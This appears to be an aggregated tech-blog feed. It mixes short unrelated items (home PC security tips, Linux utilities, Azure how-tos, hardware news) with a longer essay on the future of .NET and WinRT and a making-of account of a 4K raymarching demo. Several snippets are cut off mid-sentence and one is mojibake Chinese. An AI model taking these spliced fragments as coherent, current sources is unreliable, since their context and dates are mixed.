Kali Linux | Rebirth of BackTrack, the Penetration Testing Distribution.: The most advanced penetration testing distribution, ever. From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created. BackTrack has grown far beyond its humble roots as a live CD and has now become a full-fledged operating system

          4 intelligent thoughts from a deep geek        

(1) If you don't want to pay for an anti-virus program, at least install a free one.
Your PC probably came with a trial version of an anti-virus program that will stop working after a month unless you upgrade to the paid version. Of course you can do that if you want. Especially if you ever think you might want phone tech support for your anti-virus software, I expect it's better for a product that you've paid money for.
On the other hand, I know people who thought that if they didn't want to pay for the upgrade to their PC's default anti-virus program, their only option was to let it expire and let their computer run unprotected. If you don't want to pay for a non-free program, install a free one -- Wikipedia has a list of 15 different free or freemiumanti-virus products for Windows. PC Magazine gave their "Editor's Choice" award for best free Windows anti-virus to Malwarebytes Anti-Malware 1.70 in 2013 and AVG Anti-Virus Free in 2012, so either of those will work.
(Yes, I know you guys know this. But pass the word on to your Mom or kid brother with the new laptop.)
(2) Save files to a folder that is automatically mirrored to the cloud, for effortless backups.
The era in which everybody talks about backing up, but nobody actually does it, should have ended completely in 2013. Old-style backups, even the incredibly easy options, still mostly required you stop what you were doing for a minute, connect to a remote server or connect a piece of hardware to your computer, and twiddle your thumbs while waiting for some copy process to execute. So nobody bothered.
With cloud-mirrored folders, there's no excuse any more. I found out about Dropbox by asking a mailing list, "I would really like it if there were an online backup service that let me open and close files from a local folder so that there was no delay, but as soon as I made any changes, would automatically be queued to be backed up over the network to a remote host," and my listmates said, "That already exists." Windows 8 comes with the similar SkyDrive service already built in.
You can read a detailed comparison of Dropbox vs. SkyDrive vs. Google Drive, but the key point is to use one of them to mirror one of your local folders to the cloud, and get into the habit of saving stuff to that folder. Obviously this may not apply to you if you have something special going on (if you're creating large multimedia files that won't fit within the several-gigabyte limit imposed by these services, or if your privacy concerns are great enough that you don't want to back up files online), but it's good enough for most people. The horror stories about people saving months or years of writing, and then losing it all in a hard drive crash, should never happen to anyone again.
(3) Create a non-administrator guest account, in case a friend needs to borrow the computer.
Some of my friends and relatives have no problem telling people, "No, I don't care if you need to check the weather, you can't touch my computer!" But if you can't resist the urge to be helpful if someone needs to borrow your laptop for a few minutes, then eventually one of those people will mess it up somehow -- either by installing a game, or visiting a website that installed malware on your computer, or just changing a system setting that you can't figure out how to change back.
When the day comes when someone needs to borrow your computer, you may be too rushed or might not know how to create an unprivileged non-administrator account that they can log in under. So go ahead and do it when your computer is brand new, while the thought is still fresh in your mind. Then if people who borrow your computer sign in under that account, in almost all cases, nothing that they do while logged in should interfere with your user experience when you log them off and log back in as yourself.
That's not a completely secure solution to stop someone from accessing private files on your computer. (There are many pages describing how to boot up a Windows machine from a Linux CD, in order to access files on the computer -- they are usually described as "disaster recovery" options, but they can also be used to access files on a PC without the password.) However, it will stop most casual users from messing up your computer while they borrow it.
(4) Be aware of your computer's System Restore option as a way of fixing mysterious problems that arose recently.
I say "be aware" because, unlike the other three tips, this may not ever be something that you have to actually do. However, intermediate-level computer users just need to understand what it means: to restore your computer's settings and installed programs to a recently saved snapshot, while leaving your saved files untouched. This means if your computer has started acting funny in the last couple of days, you may be able to fix the problem by restoring to a snapshot that was saved before the problems started.
Intermediate users sometimes confuse this with either (a) restoring files from backup, or (b) doing a system recovery (which generally refers to restoring your computer to the state in which it left the factory). So if you're the techie doing the explaining, make sure they understand the difference. (A system recovery will often fix problems, too, but then of course you'll have to re-install all your software; a system restore is more convenient since it only undoes the most recent system changes.)


transcription editor for census records, church records, birth, marriage, baptisms, burials, index records etc

GenScriber is a transcription editor for census records, church records, birth, marriage, baptisms, burials, index records etc.
Please note: GenScriber does NOT convert images into text. It is NOT OCR software.

GenScriber is designed to be intuitive and easy to use. The interface is comprised of several resizable windows within a single main window. A register image can be viewed in the top window while data is input in the bottom window.

The data input area uses a spreadsheet style grid, but GenScriber is not a spreadsheet.

GenScriber is a stable, non-volatile data input application, designed for a specific purpose.
The problems associated with using spreadsheets for genealogical data input do not apply here. All cell inputs are alphanumeric. No assumptions are made about the data type. Dates and values are not automatically modified to some alien value you didn't want. Unless you specify a special action on a column, all data input remains exactly as you entered it.

GenScriber is free for private and none commercial use.

It requires no installation. Versions for Linux and Windows are currently available.
          Linux Auto Mouse Click        

Linux Mouse and Keyboard Automation Software Tools

Whether you are using your Linux on Single or Multiple Monitor Computer, every Pixel on your Monitor is defined by X and Y Co-Ordinates. On a Basic Single Monitor Linux Computer, value of X Co-Ordinates start at Left Hand Side and go on increasing to the right. Similarily values of Y-Co-Ordinates starts at top and go ono increasing towards the bottom of the screen. Total Number of Pixels together define the Screen Resolution.

This Linux Mouse Automation Software displays X and Y Co-Ordinates of the Mouse Cursor at the top right corner. In order to understand the X and Y Co-Ordinates, just move the Mouse Cursor around the screen and notice the X and Y Co-Ordinate Values change in the software.

In order to click at some location on the screen automatically with this Linux Automation Software, you would need to specify the X and Y Co-Ordinates of that particular location. Seperate Edit Boxes have been provided on the software's main screen to capture X and Y Co-Ordinates. In order to fill in the X and Y Co-Ordinates, you can use a System wide Keyboard Shortcut. The System Wide Keyboard Shortcut is a Key Combination (Configurable from Settings of the Software) which works even when this Linux Automation Tool does not have Focus. Just Move the Mouse Cursor to the desired location and press the System Wide Keyboard Shortcut Key to automatically enter the screen location in the edit boxes provided. Configure other parameters and then press the Add Click Button to store the Mouse Click in the List of Mouse Click to Automate.

desktop automation utility - QT version

Version: 0.71.2

AutoKey is a desktop automation utility for Linux and X11. It allows you to manage collection of scripts and phrases, and assign abbreviations and hotkeys to these. This allows you to execute a script or insert text on demand in whatever program you are
          å°¤åˆ©å¡ 对《Linux主机上如何设置使用自定义php.ini》的评论        
待到深入研究 自定义php.ini 时再用一下……
     摘要: tomcat运行php的几种方式  é˜…读全文

疯狂 2011-06-16 15:04 发表评论

          Comment on Operating Systems and File Systems Cross-Compatibility: Windows, Apple, Linux, Playstation, xBox, Android by Graham Gawthorpe        
This blog shows the situation but says nothing about the solution for incompatibiliy.
          Taking a snapshot of a Managed Disk        
We talked about Managed Disks, now let’s use them. Let’s snapshot a Managed Disk and restore the snapshot on another VM. Deploy ARM Template We used the resource group named md-demo-snapshot. This deploys a single Linux VM into a managed availability set using a premium managed disk The deployment takes a few minutes Customize VM […]
          Kaspersky Anti- Virus Support        
Kaspersky Anti- Virus support, as the name suggests, is a program developed by Kaspersky Lab. It has been certified for Windows 7 as well. It is a good anti-virus support program that protects users from malware. There is also a version of running it on Linux for business consumers. It has the ability to do [...]
          Joining an ARM Linux VM to AAD Domain Services        
Active Directory is one of the most popular domain controller / LDAP server around. In Azure we have Azure Active Directory (AAD).  Despite the name, AAD isn’t just a multi-tenant AD.  It is built for the cloud. Sometimes though, it is useful to have a traditional domain controller…  in the cloud.  Typically this is with […]
          Italians overclock Pentium 4 to 8.18 GHz        

Italians overclock Pentium 4 to 8.18 GHz

WHILE FERRARI WAS soundly beaten by British machinery last weekend in Monaco, the Italians did their best to keep their pride up'n'running. This time, ThuG and his fellow members from OC Team Italy pushed their platinum sample Pentium 4 631 - to massive 8.18 GHz, making all those old-time gamedevs sweat with dreams what could have been. If the record is true, hats down lads.

OverclockersClub tested BenQ FP222WH, a 22" LCD widescreen monitor that sells for mediocre 269.99 US. Honestly, if you are thinking about a new monitor, this one just sounds like a dream. I remember when I bought my 22" iiyama Vision Master Pro. Dealer gave me a hefty discount, so I ended up paying only 2300 US dollars. Today, you get the same screen (albeit in a little lower resolution) for almost 10 times less, and I bought that iiyama in 2000.

Bit-Tech tested Corsair DDR3-1333 modules, that come in Dominator format (of course, with their tri-fan DHX cooling). Since benchmark results are less than stellar, guys gave conservative conclusion. Time for DDR3 will come, though.

And for those that do not want to spend massive amounts of money on new memory standard and appropriate motherboard but still want the best - Legit Reviews tested OCZ's PC2-9200 Reaper Edition memory.

HardwareSecrets tested MSI's GeForce 8500GT, board that is targeting entry-level market.

Overclockers from Down Under tested another silent graphics card, but this time around, we are talking about Gigabyte's vision of 8600GTS graphics card.

Virtual-Hideout tested Antec P182 aluminium case, probable choice for selected few that will be able to afford. However, this case packs some serious punch for those that intend to put multiple graphics cards or hot CPUs.

In meanwhile, Ocworkbench managed to get a hold of AMD's RD790 motherboard and ran four boards in Crossfire. This board will be all over Computex in more flavours than one, so brace for impact. All that we know is that AMD roadmaps claim this chipset comes with PCI Express 2.0, industry's first.

Phoronix decided to do a deep dive and compared ATi Drivers under Ubuntu and Windows operating systems. With Ubuntu coming even as a live CD, you should try to use Linux - Phoronix gives the lowdown for owners of ATI hardware.

CoolTechZone came up with a review of iRiver S10. Yes, there is somebody else making MP3 players other than Fruity Company. And this one makes iPod shuffle look like a giant.

          Techview Podcast für RadioTux #135: Plasma Active Two (Linux auf Tablets)        
          VLC Player Coming To Android In "A Matter Of Weeks"        

VLC on AndroidThe incredibly popular VLC Player is finally coming to Android after months of hard work by the open source project developers. Originally a desktop media center for Linux, Windows, and Mac, this versatile player will bring many new video-playing features to our beloved OS including a wide variety of formats such as DivX and Dolby TrueHD. The lead developer in the project, Jean-Baptiste Kempf, has confirmed that it will hit the Android Market in "just a few weeks", which means that Android will be the first mobile platform to have a version of this software finally follow iOS and get its own port (thanks, Mikeyy).

Read More

VLC Player Coming To Android In "A Matter Of Weeks" was written by the awesome team at Android Police.

          Linuxinfotag Landau 2011 Rückblick        
          Seminar Topics(100)        
Excellent Seminar/Paper Presentation Topics for Students

Put the desired topic name in search bar to get detail search about the topic.

1. 4G Wireless Systems
3. Artificial Eye
4. Animatronics
5. Automatic Teller Machine
6. Aircars
7. Adding interlligence to ineternet using satellite
9. Aeronautical Communications
10. Agent oriented programing
11. Animatronics
12. Augmented reality
13. Autonomic Computing
14. Bicmos technology
16. Biomagnetism
17. Biometric technology
19. Boiler Instrumentation
20. Brain-Computer Interface
21. Bluetooth Based Smart Sensor Networks
22. BIBS
23. CDMA Wireless Data Transmitter
24. Cellonics Technology
25. Cellular Positioning
26. Cruise Control Devices
27. Crusoe Processor
28. Cyberterrorism
29. Code division duplexing
30. Cellular Digital Packet Data
31. Computer clothing
32. Cordect WLL
35. CDMA
55. CVT
56. Delay-Tolerant Networks
58. DiffServ-Differentiated Services
59. DWDM
60. Digital Audio Broadcasting
61. Digital Visual Interface
62. Direct to home television (DTH)
80. DSL
81. DTM
82. DWDM
86. Embedded system in automobiles
87. Extreme Programming
88. EDGE
90. E BOMB
          Ubuntu Linux now on Windows Store        
Today, we're excited to announce that Canonical's Ubuntu Linux Distro is now available in the Windows Store and can be downloaded and installed on any Windows Insider build >= #16215! Eventually this will be available to all regular Windows 10 users.
          Quelle est la différence?        
Voici le logo d’un cabinet de relation publique de Montréal. Et celui de la distribution GNU/Linux Debian Elle est où la différence ? Également à lire.....100% libre: mon expérimentation (2) (25)Xsshfs – Interface graphique GTK pour sshfs (8)100% libre: mon expérimentation (1) (15)100% libre, c'est possible? (29)Cyberapprentissage: Iconito École Numérique (9)Sovrn
          ÐžÐ±Ð½Ð¾Ð²Ð»ÐµÐ½Ð¸Ðµ сертифицированной версии Dr.Web Enterprise Security Suite        

3 августа 2017 года

Компания «Доктор Веб» сообщает о завершении инспекционного контроля для сертифицированной в ФСТЭК России версии Dr.Web Enterprise Security Suite (сертификат соответствия от 27 января 2016 г. № 3509). Эта процедура была направлена на исправление уязвимости Z-2016-02373, расширение перечня поддерживаемых ОС (добавлена поддержка AstraLinux 1.5), а также на оптимизацию состава модулей компонентов без изменения функциональности.

Для получения обновления необходимо в веб-интерфейсе Центра управления Dr.Web изменить зону обновления на /update/fstek2017feb. Обновленные дистрибутивы Dr.Web, а также обновленный формуляр к продукту пользователи сертифицированной версии могут получить, обратившись в службу технической поддержки «Доктор Веб».

При необходимости проверки целостности загруженных файлов вычислить контрольные суммы можно с использованием алгоритма «Уровень-1» и сравнить их с контрольными суммами, указанными в файле «КС установочных файлов после ИК».

Обновление Dr.Web Security Space, Антивируса Dr.Web и Антивируса Dr.Web для файловых серверов Windows пройдет автоматически, однако потребует перезагрузки компьютеров.

          Going Native 2.0, The future of WinRT        
In the recent years, we have seen lots of fuzz about the return of “Going native” after the managed era popularized by Java and .NET. When WinRT was revealed last year, there was some shortsighted comments to claim that “.NET is dead” and to glorify the comeback of the C++, the true and only real way to develop an application, while at the same time, JIT was being more and more introduced in the scripted world (JavaScript being one of the most prominent JIT user). While in the end, everything is going native anyway - the difference being the length of the path to go native and how much optimized it will be - the meaning of the “native” word  has slightly shifted to be strongly and implicitly coupled with the word “performance”. Even being a strong advocator for managed language, the performance level is indeed below a well written C++ application, so should we just accept this fact and get back to work with C++, with things like WinRT being the backbone of the interop? To tell you the truth, I want .NET to die and this post is about why and for what.

The Managed Era

Let’s just begin by revisiting recent history of managed development that will highlight current challenges. Remember the Java slogan? “write once runs everywhere”, it was the introduction of a paradigm where a complete “safe” single language-stack based on a virtual machine associated with a large set of API would allow to easily develop an application and target any kind of platforms/OS. It was the beginning of the “managed” era. While Java has been quite successfully adopted in several development industries, it was also quite rejected by lots of developers that were aware of memory management caveats and the JIT not being as optimized as it should be (though they did some impressive improvements over the years) with also a tremendous amount of bad design choice, like the lack of native struct, unsafe access or the route to go native through JNI extremely laborious and inefficient (and even recently, that they were considering to get rid off all native types and make everything an object, what a terrible direction!).

Java failed also in the heart of his slogan: it was in fact not possible to embrace in a single unified API all the usage of each target platforms/OS, leading to things like Swing, not what can be called an optimal UI framework. Also, from the beginning, Java was only design with a single language in mind, though lots of people found JIT/bytecode as an opportunity to port scripting languages to Java JVM.

In the meantime of early Java, Microsoft that tried to enter the Java market by integrating some custom language extensions (with the end story we know) and finally came with their own managed technology, which was in several aspects better conducted and designed: from the ground bytecode, unsafe construct, native interop, lightweight but very efficient JIT + NGEN, C# rapid language evolution, C++/CLI... etc, taking multiple language interop into account from the beginning and without the burden of the Java slogan (though Silverlight on MacOS or Moonlight were a good try).

Both systems share a similar managed monolithic stack: metadata, bytecode, JIT and GC are tightly coupled. Also performance wise, it is far from being perfect: the JIT is implying a startup cost and the executing code is not as fast as it should mainly because:
  1. The JIT is performing poor optimization compare to full C++ -O2, because it needs to be fast when generating code (also, unlike Java hotspot JVM, .NET JIT is not able to hot swap existing JIT code by a better optimized code)
  2. Managed types, like Array access are always checking bounds (apart for simple loops where the JIT can suppress the check if the for-limit is less or equal the array’s length)
  3. GC can pause all threads to collect objects (though new GC in 4.5 made some improvements) which can cause unexpected slow down in an application.
But even with this performance deficiency, a managed eco-system with its comprehensive Framework is the king of productivity and language interop, with a descent overall performance for all languages running inside it. The apogee of the managed era was probably around the launch of Windows Phone and Visual Studio 2010 (using WPF for its rendering, though WPF is also built on top of lots of native code), where managed languages were the only authorized way to develop an application. That was not the best thing that could happen, considering the long list of pending issues with .NET performance, enough to stimulate all the “native coders” to strike back, and they were absolutely in their rights.

It turns out that somewhat it signs the "decline" of .NET. I don’t know much about Microsoft organization internals, but what is commonly reported is that there is some serious competition between divisions, good or bad, but for .NET, for the past few years, Microsoft seemed to running out of gas (for example, almost no significative improvements in the JIT/NGEN, lots of pending request for performance improvements, including things like SIMD that were asked for a long time), and my guess is that the required changes could only take place in a global strategy, with deep support and commitment from all divisions.

In the mean time, Google was starting to push its NativeClient technology, allowing to run sandboxed native code from the browser. Last year, in this delirium trend of going native, Microsoft revealed that even HTML5 implemented in next IE was going native! Sic.

In "Reader Q&A: When will better JITs save managed code?" Herb Sutter, one of the "Going Native" evangelist, provides some interesting insights about what the "Going Native" philosophy is thinking about JIT, with lots of inaccurate facts, but lets just focus on the main one : Even if JIT could improve in the future, managed languages made such a choice of safety over performance, that they are intrinsically doomed to not play in the big leagues. Miguel de Icaza posted a response about it in "Can JITs be faster?" and he explained lots of relevant things about why some of Herb Sutter statements were misleading.

Then WinRT came here to somewhat smooth the lines. By taking part of the .NET philosophy (metadata and some common “managed” types like strings and arrays) and the good old COM model (for a common denominator of native interop), WinRT is trying to solve the problem of language interoperability outside the CLR world (thus without the performance penalties for C++) and to provide a more “modern” OS API. Is this the definitive answer, the one that will rule them all? So far, not really, it is on the direction of the certain convergence that could lead to great things, but it is still uncertain that it will take the right track. But what could be this “right track”?

Going native 2.0, Performance for All

Though safety rules can have a negative impact on performance, managed code is not doomed to be run by poor JIT compiler (For example, Mono is able to run C# code natively compiled through LLVM on iOS/Linux) and it would be fairly easy to extend the bytecode with more "unsafe" levels to provide fine grained performance speedup (like suppressing array bounds checking...etc.).

But the first problem that can be currently identified is the lack of a strong cross-language compiler infrastructure, this is ranging from the compiler used in IE10 Javascript JIT, to the .NET JIT and NGEN compilers or into the Visual C++ compilers (to name a few), all using different code for almost the same kind of laborious and difficult problem of generating efficient machine code. Having a single common compiler is a very important step to provide a high performance code accessible from all languages.

Felix9 on Channel9 found that Microsoft could be actually working on this problem, so that's a good news, but the problem of the "performance for all" is a small part of a bigger picture. In fact the previous mentioned "right track" is a broader integrated architecture, not only an enhanced LLVM stack, but baked by Microsoft's experience in several fields (C++ compiler, JIT, GC, metadatas... etc), a system that would expose a completely externalized and modularized “CLR” composed of:

  • An intermediate mid level language, entirely queriable/reflectionnable, very similar to LLVM IR or .NET bytecode, defining common datatypes (primitives, string, array... Etc). An API similar to System.Reflection.Emit should be available. Vectorized types (SIMD) should be first class types as int or double are. This IL code should not be limited to CPU target usage, but should allow GPU computing (similar to AMP) : it should be possible to express HLSL bytecode with this IL, with the benefits to leverage on a common compiler infrastructure (see following points). Typeless IL should also be possible to allow dynamic languages to be expressed more directly.
  • A dynamic linked library/executable, like assemblies in .NET, providing metadatas, IL code, query/reflection friendly. When developing, code should be linked against assemblies/IL code (and not against crappy C/C++ headers).
  • An IL to native code compiler, which could be  integrated in a JIT, an offline or a cloud compiler, or a mixed combination. This compiler should provide vectorization whenever target platform support it. IL code would be compiled to native code at install/deploy time, based on the target machine architecture (at dev time, it could be done after the whole application has been compiled to IL).  The compiler stages should be accessible from an API and offer extension points as much as possible (providing access to IL to IL optimization, or to provide pluggable IL to native code transform). The compiler would be responsible to perform global program optimization at deploy time (or at runtime for JIT scenarios). Optimizations options should range from fast compilation (like JIT) to aggressive (offline, or hot swap code in a JIT). A profile of the application could also be used to automatically tune localized optimizations. This compiler should support advanced JIT scenarios, like dynamic hotspot analysis and On Stack Replacement (aka OSR, allowing heavy computation code to be replaced at runtime by a better optim code), unlike current .NET JIT that only compiles a method on a 1st run. This kind of optimization are really important in dynamic scenarios where type inference is sometimes discovered later (like Javascript).
  • An extensible allocator/memory component, allowing concurrent allocators, where the Garbage Collector/GC would be one implementation, though a major part of applications would use it to manage most of their lifecycle objects, leaving the most performance critical objects to be managed by other allocator schemes (like reference counting scenarios used by COM/WinRT). There is no restrictions to use different allocator models in a same application (and this is already what's happening when in a .NET application we need to deal with native interop to allocate objects using OS functions).
The philosophy is very similar to a CLR stack, however it doesn't force an application to be ran by a JIT compiler (yes there is NGEN in .NET, but it was designed for startup reasons, not for high performance reasons, plus it is a black box only working on assemblies installed into the GAC) and it allows mixed memory allocation GC/non-GC scenarios.

In this system, full native interoperability between languages would then be straightforward without sacrifying performance over simplicity and vice-verca. Ideally, an OS should be built from the ground up with such a core infrastructure. This is what was (is?) probably behind a project like Redhawk (for the compiler part), or Midori (for the OS part), in such an integrated system, probably only drivers would require some kind of unsafe behaviors.

[Update 9 Aug 2012: Felix9 again found that an intermediate bytecode, more low level than  MSIL .NET bytecode, called MDIL could be already in used, and that could be the intermediate bytecode mentioned just above, though looking at the related patent "INTERMEDIATE LANGUAGE SUPPORT FOR CHANGE RESILIENCE", there are some native x86 registers in the specs that don't fit well with an architecture independent bytecode. Maybe they would keep MSIL as-is and leverage on a lower level MDIL. We will see.].

So what WinRT is tackling in this big picture? Metadatas, a bit of sandboxes API and an embryo of interoperability (through common datatypes and metadatas), as we can see, not so much, a basic COM++.  And as we can obviously realize, WinRT is not able to provide advanced optimizations in scenarios where we use a WinRT API: for example, we cannot have a plain structure that can expose inlinable methods. Every method calls in WinRT are virtual calls, forced to go through a vtable (and sometimes several virtual calls are needed, when for example a static method is used), so even a simple property get/set will go through a virtual call. This is clearly inefficient. It looks like WinRT is only targeting coarse level API, leaving all the fine grained level API at the mercy of performance heterogeneity, restricting common scenarios where we want to access high performance code everywhere, without going through a layer of virtual calls and non-inlinable code. Using an extended COM model is not what we can call “Building the Future”.

Productivity and Performance for C# 6.0

A language like C# would be a perfect candidate in such a modular CLR system, and could be mapped easily to the previous intermediate bytecode.  Though to efficiently use such a systen, C# should be improved on several aspects:
  • More unsafe power where we could turn off “managed” behaviors like array access checking (kind of “super unsafe mode”, where we could possibly use CPU pre-caching instructions before accessing next array elements, kind of "advanced" stuff impossible to do with current managed arrays without using unsupported tricks)
  • A configurable new operator that would integrate different allocator schemes.
  • Vectorized types (like HLSL float4) should be added to the core types. This has been asked for a long time (with ugly patches in XNA WP to "solve" this problem).
  • Lightweight interop to native code (in the case we would still be calling native code from C# unlike in an integrated OS): current manage to unmanaged transition is costly when calling native methods even without any "fixed" variables. An unsafe transition should be possible without the burden of the current x86/x64 prologue/epilogue of the unmanaged transition generated by current .NET JIT.
From a general language perspective, not strictly related to performance, there are lots of small area that would be important to be addressed as well:
  • Generics everywhere (in constructors, in implicit conversions) with more advanced constructs (contracts on operators... etc), closer to C++ template versatility but safer and less cluttered.
  • Struct inheritance and finalizers (to allow lightweight code to be executed on exit of a method, without going through the cumbersome "try/finally" or "using" patterns).
  • Add more MetaProgramming: allow static method extensions (not only for "this"), allow class mixin (mixin the content of a class inside another, usefull for things like math functions), allow modification of class/types/methods construction at compile time (for example, methods that would be called at compile time to add method/properties to a class, very similar to eigenclass in Ruby meta-programming instead of using things like T4 template code generation), more extensively, allow DSL like syntax language extensions at several points into the C# parser (Roslyn doesn't provide currently any extension point inside the parser) so that we could express language extensions in C# as well (for example, instead of having Linq syntax hardcoded, we should be able to write it as an extension parser plugin, fully written in C#). [Edit] I have posted a discussion "Meta-Programming and parser extensibility in C# and Roslyn" about what is intended behind this meta-programming thing at the Microsoft Roslyn forum. Check it out![/Edit]
  • A builtin symbol or link type where we could express a link to a language object (a class,  a property, a method) by using a simple construction like: symbol LinkToMyMethod = @MyClass.MyMethod; instead of using Linq expressions (like (myMethod) => MyMethod inside MyClass). This would make more robust code using INotifyPropertyChanged or simplify all property based systems like WPF (which is currently an ugly duplication of the method definition).
Bottom line, is that there is less to add to C# than there is to remove from C++ to fully leverage on such a system and to greatly improve developer’s productivity, again without burning efficiency. One could argue that C++ already offers all of this and much more, but this is exactly why C++ is so much cluttered (syntax wise) and dangerous for the vast majority of developers. It allows unsafe everywhere, while unsafe code is always localized in an application (and is always source of memory corruption, so it is much easier to fix if they are clearly identified and strictly localized in the code, same than using asm keyword in non standard C/C++). It is easier and safer to track exceptional usages in a large codebase than to have it allowed everywhere.


We can hope that Microsoft took a top-down approach, by addressing unified OS API for all languages and simple interoperability first, and that they will introduce these more advanced features in later version of their OS. But this is an ideal expectation and it will be interesting to follow if Microsoft will effectively challenge this. Even if It was recently revealed that WP8 .NET applications would benefit some Cloud compilers, so far, we don't know much about it: Is it just a repackaging of NGEN (which is again, not performance oriented, generating code very similar to current JIT) or a non public RedHawk compiler?

Microsoft has lots of gold in their backyard, with years of advanced native code compilations with their C++ compiler, JIT, GC, and all the related R&D projects they have...

So to summarize this post: .NET must die to a better integrated, performance oriented, common runtime where the managed (safety/productivity) vs native (performance) is no longer a border, and this should be a structural part of next WinRT architecture evolution.
          Making of Ergon 4K PC Intro        
You are not going to discover any fantastic trick here, the intro itself is not an outstanding coding performance, but I always enjoy reading the making of other intros, so It's time to take some time to put this on a paper!

What is Ergon? It's a small 4k intro (meaning 4096 byte executable) that was released at the 2010 Breakpoint demoparty (if you can't run it on your hardware, you can still watch it on youtube), which surprisingly was able to finish to the 3rd place! I did the coding, design and worked also on the music with my friend ulrick.

That was a great experience even if I didn't expect to work on this production at the beginning of the year... but at the end of January, when BP2010 was announced and supposed to be the last one, I was motivated to go there, and why not, release a 4k intro! One month and a half later, the demo was almost ready... wow, 3 weeks before the party, first time to finish something so ahead an event! But yep, I was able to work on it on part time during the week (and the night of course)... But when I started on it, I had no idea where this project would bring me to... or even what kind of 3D API I had to start from doing this intro!

OpenGL, DirectX 9, 10 or 11?

At FRequency, xt95 is mainly working in OpenGL, mostly due to the fact that he is a linux user. All our previous intros were done using OpenGL, although I did provide some help on some intros, bought OpenGL books few years ago... I'm not a huge fan of the OpenGL C API, but most importantly, from my short experience on this, I was always able to better strip down DirectX code size than OpenGL code... At that time, I was also working a bit more on DirectX API... I even bought a 5770 ATI earlier to be able to play with D3D11 Compute Shader api... I'm also mostly a windows user... DirectX has a very well integrated documentation in Visual Studio, a good SDK, lots of samples inside, a cleaner API (more true on recent D3D10/D3D11), some cool tools like PIX to debug shaders... and thought also that programming on DirectX on windows might reduce the risk to get some incompatibilities between NVidia and ATI graphics card (although, I found that, at least with D3D9, this is not always true...).

So ok, DirectX was selected... but which version? I started my first implementation with D3D10. I know that the code is much more verbose than D3D9 and OpenGL2.0, but I wanted to practice it a bit more the somehow "new" API than just reading a book about it. I was also interested to plug some text in the demo and tried an integration with latest Direct2D/DirectWrite API.

Everything went well at the beginning with D3D10 API. The code was clean, thanks to the thin layer I developed around DirectX to make the coding experience much closer to what I use to have in C# with SlimDx for example. The resulting C++ code was something like this :
// Set VertexBuffer for InputAssembler Stage
device.InputAssembler.SetVertexBuffers(screen.vertexBuffer, sizeof(VertexDataOffline));

// Set TriangleList PrimitiveTopology for InputAssembler Stage

// Set VertexShader for the current Pass
Very pleasant to develop with it, but because I wanted to test D2D1, I switched to D3D10.1 which can be configured to run on D3D10 hardware (with the feature level thing)... So I also started to slightly wrap up the Direct2D API and was able to produce very easily some really nice text... but wow... the code was a bit too large for a 4k (but would be perfect for a 64k).

Then during this experiment phase, I tried the D3D11 API with the Compute Shader thing... and found that the code is much more compact than D3D10 if you are performing some kind of... for example, raymarching... I didn't compare code size, but I suspect the code to be able to compete with its D3D9 counterpart (although, there is a downside in D3D11 : if you can afford a real D3D11 hardware, a compute shader can directly render to the screen buffer... otherwise, using the D3D11 Compute shader with features level 10, you have to copy the result from one resource to another... which might hit the size benefit...).

I was happy to see that the switch to D3D11 was easy, with some continuity from D3D10 on the API "look & feel"... Although I was disappointed to learn that working this D3D11 and D2D1 was not straightforward because D2D1 is only compatible with D3D10.1 API (which you can run with feature level 9.0 to 10), forcing to initialize and maintain two devices (one for D3D10.1 and one for D3D11), playing with DXGI shared resource between the devices... wow, lots of work, lots of code... and of course, out of question for a 4k...

So I tried... a plain old good D3D9... and that was of course much compact in size than their D3D10 counterpart... So for around two weeks in February, I played with those various API while implementing some basic scene for the intro.I just had a bad surprise when releasing the intro, because lots of people were not able to run it : weird because I was able to test it on several NVidias and at least my ATI 5770... I didn't expect D3D9 to be so sensitive to that, or at least, a bit less sensitive than OpenGL... but I was wrong.

Raymarching optimization

I decided to go for an intro using the raymarching algorithm that was more likely to be able to deliver a "fat" content in a tiny amount of code. Although, the raymarching stuff was already a bit in the "retired", after the fantastic intros released earlier in 2009 (Elevated - not really a raymarching intro but soo impressive!, Sult, Rudebox, Muon-Baryon...etc). But I didn't have enough time to explore a new effect and was not even confident to be able to find anything interesting at that time... so... ok, raymarching.

So for one week, after building a 1st scene, I spent my time to try to optimize the raymarching algo. There was an instructive thread on pouet about this : "So, what do distance field equations look like? And how do we solve them?". I tried to implement some trick like...
  1. Generate grid on the vertex shader (with 4x4 pixels for example), to precompute a raw view of the scene, storing the minimal distance step to go before hitting a surface... let the pixel shader to get those interpolate distances (multiplied by a small reduction factor like .9f) and perform some fine grained raymarching with fewer iterations
  2. Generate a pre-rendered 3D volume of the scene at a much lower density (like 96x96x96) and use this map to navigate in the distance fields while still performing some "sphere tracing" refinement if needed
  3. I tried also somekind of level of detail on the scene : for example, instead of having a texture lookup (for the "bump mapping") for each step during the raymarching, allow the raymarcher to use a simplified analytical surface scene and switch to the more detailled one for the last step
Well, I have to admit that all those techniques were not really clever in anyway... and the result was matching the lack of this cleverness! None of them provide a significant speed optimization compare to the code size hit they were generated.

So after one week of optimization, well, I just went to a basic raymarcher algo. The shader was developed under Visual C++, integrated in the project (thanks to NShader syntax highlighting). I did a small C# tool to strip the shader comments, remove unnecessary spaces... integrated in the build (pre-build events in VC++), It's really enjoyable to work with this toolchain.

Scenes design

For the scenes, I decided to use the same kind of technique used in the Rudebox 4k intro : Leveraging more on the geometry and lights, but not on the materials. That made the success of the rudebox and I was motivated to build some complex CSG with boolean operations on basic elements (box, sphere...etc.). The nice thing about this approach is that It avoids to use inside the ISO surface anykind of if/then/else for determining the material... just letting the lights properly set in the scene might do the work. Yep, indeed, rudebox is for example a scene with say, a white material for all the objects. What makes the difference is the position of lights in the scene, their intensity...etc. Ergon used the same trick here.

I spent around two to three weeks to build the scenes. I ended up with 4 scenes, each one quite cool on their own, with a consistent design among them. One of the scene was using the fonts to render a wall of text in raymarching.

Because I'm not sure that I will be able to use those scenes, well, I'm going to post their screenshot here!

The 1st scene I developed during my D3D9/D3D10/D3D11 API experiments was a massive tentacle model coming from a balckhole. All the tentacles were moving around a weird cutted sphere, with a central "eye"... I was quite happy about this scene that had a unique design. From the beginning, I wanted to add some post-processing, to enhance the visuals, and to make them a bit different from other raymarching scene... So I went with a simple post-processing that was performing some patterns on the pixels, adding a radial blur to produce some kind of "ghost rays" coming out from the scene, making the corners darker, and adding a small flickering the more you go to the corners. Well, only this piece of code was already taking a scene on its own, but that was the price to have a genuine ambiance, so...

The colors and theming was almost settled from the beginning... I'm a huge fan of warm colors!

